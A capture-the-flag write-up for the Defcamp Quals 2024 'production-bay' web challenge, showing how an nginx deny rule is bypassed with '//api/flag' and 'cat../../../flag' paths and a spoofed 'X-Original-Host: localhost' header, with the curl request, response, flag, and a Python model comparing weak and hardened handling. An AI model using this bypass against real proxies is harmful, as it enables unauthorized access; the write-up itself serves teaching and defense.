[Defcamp Quals 2024] [WEB – production-bay] Write Up

Description

Some powerful proxy protects our cat factory production bay, but the strange thing is that we edited some nginx config in the platform to protect our /flag route, and things do not look as secure as expected.

Flag format: ctf{sha256sum}

Preamble

We can access a website that shows us cat images generated via an API.
Analyzing the source code, we can see that the endpoint for the cat “factory” is located at /api/data/cat.

Analysing

Manually fuzzing some parameters here, we got a strange response when accessing /api/data that tells us to pass ?host=xxx in the URL.

When passing our own host, we got a remote connection from the Flask app, revealing some headers such as X-Real-Ip, X-Forwarded-For and X-Original-Host.

After a lot of attempts, such as trying to redirect to /flag from our server, we moved on to other ideas…

By trying a URL like /api/data/cat../../../flag, we can see that we can reach the Flask app behind nginx without access being denied o/

But we got an error because the request was not coming from localhost:5000.

Remember the headers we got earlier from Flask? We tried setting X-Original-Host to localhost and then…

Resolution

$ curl -vvv http://34.159.76.217:32222//api/flag -H 'X-Original-Host: localhost'
*   Trying 34.159.76.217:32222...
* Connected to 34.159.76.217 (34.159.76.217) port 32222 (#0)
> GET //api/flag HTTP/1.1
> Host: 34.159.76.217:32222
> User-Agent: curl/7.81.0
> Accept: */*
> X-Original-Host: localhost
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 28 Sep 2024 17:45:05 GMT
< Content-Type: application/json
< Content-Length: 113
< Connection: keep-alive
< 
{"flag":"ctf{89b52b00fd39c0410372b898632e6bf0648ae9f43d500762d03af9e7768bcbfd}","request.host":"localhost:5000"}
* Connection #0 to host 34.159.76.217 left intact

The flag was: ctf{89b52b00fd39c0410372b898632e6bf0648ae9f43d500762d03af9e7768bcbfd}
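The two weaknesses the write-up chains together, modelled in Python as an added example (this is not the challenge's own nginx or Flask code, which is not on the page): an edge deny rule that matches the raw request path, so the write-up's /api/data/cat../../../flag and //api/flag spellings slip past a rule written for /api/flag, and a backend that derives request.host from an X-Original-Host header the proxy relays from the client instead of setting itself. Each weak piece sits beside its hardened form. The header names, hosts and paths come from the write-up; the matching logic, the FLAG placeholder and the names handle_request, edge_forward, backend_flag_route and normalize_path are assumptions for illustration.

```python
"""Added example, not the challenge's code: a model of the write-up's two weaknesses,
each beside a hardened form.

  1. an edge deny rule applied to the *raw* request path, bypassed by
     '/api/data/cat../../../flag' and '//api/flag';
  2. a backend whose request.host comes from a client-relayed X-Original-Host header.

Header names, hosts and paths come from the write-up; the matching logic is assumed.
"""
from typing import Dict, Optional, Tuple

DENIED_PREFIXES = ("/api/flag",)       # the route the nginx rule was meant to protect
FLAG = "ctf{FLAG_PLACEHOLDER}"         # placeholder, not the real flag
TRUSTED_BACKEND_HOST = "localhost"     # backend serves /api/flag only for this host


def normalize_path(raw_path: str) -> str:
    """Collapse repeated slashes and resolve '.' / '..' segments (RFC 3986 5.2.4 style).
    A segment such as 'cat..' is an ordinary name; only an exact '..' climbs a level."""
    out = []
    for seg in raw_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def blocked_naive(raw_path: str) -> bool:
    """Weak edge rule: prefix match on the path exactly as the client sent it."""
    return raw_path.startswith(DENIED_PREFIXES)


def blocked_normalized(raw_path: str) -> bool:
    """Hardened edge rule: normalize first, then match, so every spelling of the
    protected path is caught."""
    return normalize_path(raw_path).startswith(DENIED_PREFIXES)


def edge_forward(client_headers: Dict[str, str], real_host: str, hardened: bool) -> Dict[str, str]:
    """Reverse-proxy hop. The weak proxy relays the client's X-Original-Host untouched;
    the hardened one overwrites it with the Host value it observed itself (what an
    nginx `proxy_set_header X-Original-Host $host;` line would do)."""
    forwarded = dict(client_headers)
    if hardened:
        forwarded["X-Original-Host"] = real_host
    return forwarded


def backend_flag_route(headers: Dict[str, str], default_host: str) -> Tuple[int, Dict[str, str]]:
    """Flask-like handler: request.host is taken from X-Original-Host when present.
    The write-up's 200 response reports request.host as 'localhost:5000', so only the
    hostname part is compared here."""
    host = headers.get("X-Original-Host", default_host)
    if host.split(":", 1)[0] != TRUSTED_BACKEND_HOST:
        return 403, {"error": "not localhost", "request.host": host}
    return 200, {"flag": FLAG, "request.host": host}


def handle_request(raw_path: str, client_headers: Dict[str, str], hardened: bool,
                   real_host: str = "34.159.76.217:32222") -> Tuple[int, Optional[Dict[str, str]]]:
    """End to end: edge deny rule -> proxy -> backend. Returns (status, JSON body)."""
    blocked = blocked_normalized(raw_path) if hardened else blocked_naive(raw_path)
    if blocked:
        return 403, None
    forwarded = edge_forward(client_headers, real_host, hardened)
    if normalize_path(raw_path) != "/api/flag":
        return 404, None
    return backend_flag_route(forwarded, default_host=real_host)


if __name__ == "__main__":
    # Constructed probe: the header the write-up sends with curl.
    probe = {"X-Original-Host": "localhost"}
    for path in ("/api/flag", "//api/flag", "/api/data/cat../../../flag"):
        weak = handle_request(path, probe, hardened=False)[0]
        fixed = handle_request(path, probe, hardened=True)[0]
        print(f"{path:32} weak={weak} hardened={fixed}")
```

Running it shows the weak stack returning 200 for both bypass spellings while the direct /api/flag request is refused, and the hardened stack refusing all three. Two changes close the hole independently: matching the deny rule against the normalized path, and having the proxy overwrite X-Original-Host rather than forwarding whatever the client supplied, so the backend's "only from localhost" check can no longer be satisfied by a header.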
